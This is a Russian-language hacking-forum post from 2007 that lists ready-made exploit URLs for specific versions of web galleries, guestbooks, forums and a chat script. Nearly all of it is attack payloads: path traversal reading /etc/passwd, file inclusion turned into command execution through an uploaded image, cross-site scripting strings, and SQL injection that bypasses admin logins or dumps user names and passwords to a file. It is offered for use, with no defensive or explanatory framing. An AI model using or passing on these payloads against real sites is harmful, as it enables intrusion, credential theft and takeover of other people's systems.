21.02.2007, 03:15
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
С нами:
10226273
Репутация:
370
|
|
Ещё пара штук:
Галлереи
4images 1.7.1
http://[target]/[path]/index.php?template=../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/index.php?cmd=ls%0-la&template=../../data/tmp_media/suntzu1293.jpg%00
35mmslidegallery 6
http://example.com/lumet/album/index.php?imgdir='><script>alert(10)</script>
http://example.comr/lumet/album/popup.php?w='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?h='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?t='><script>alert(10)</script>
Гостевые:
@lex Guestbook 4.0.1
http://[victim]/[guestbook_path]/index.php?skin=[XSS]
Форумы:
ADNForum 1.0b
http://host/adnforum/index.php?fid=3333'%20union%20select%201111/*
ADP Forum 2.0.3
http://target.com/pacth/users/username.txt
CAForum 1.0
admin/default.asp?password=1'%20OR%20'1'%20=%20'1
CoolForum 0.8.3
editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1
CS-Forum 0.81
read.php?msg_result=[XSS]
/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
/index.php?search=%'[SQL_SELECT]%23
/index.php?debut=1[SQL]
Чаты:
Andys Chat 4.5
/register.PHP?action=[CMD-Script]
|
|
|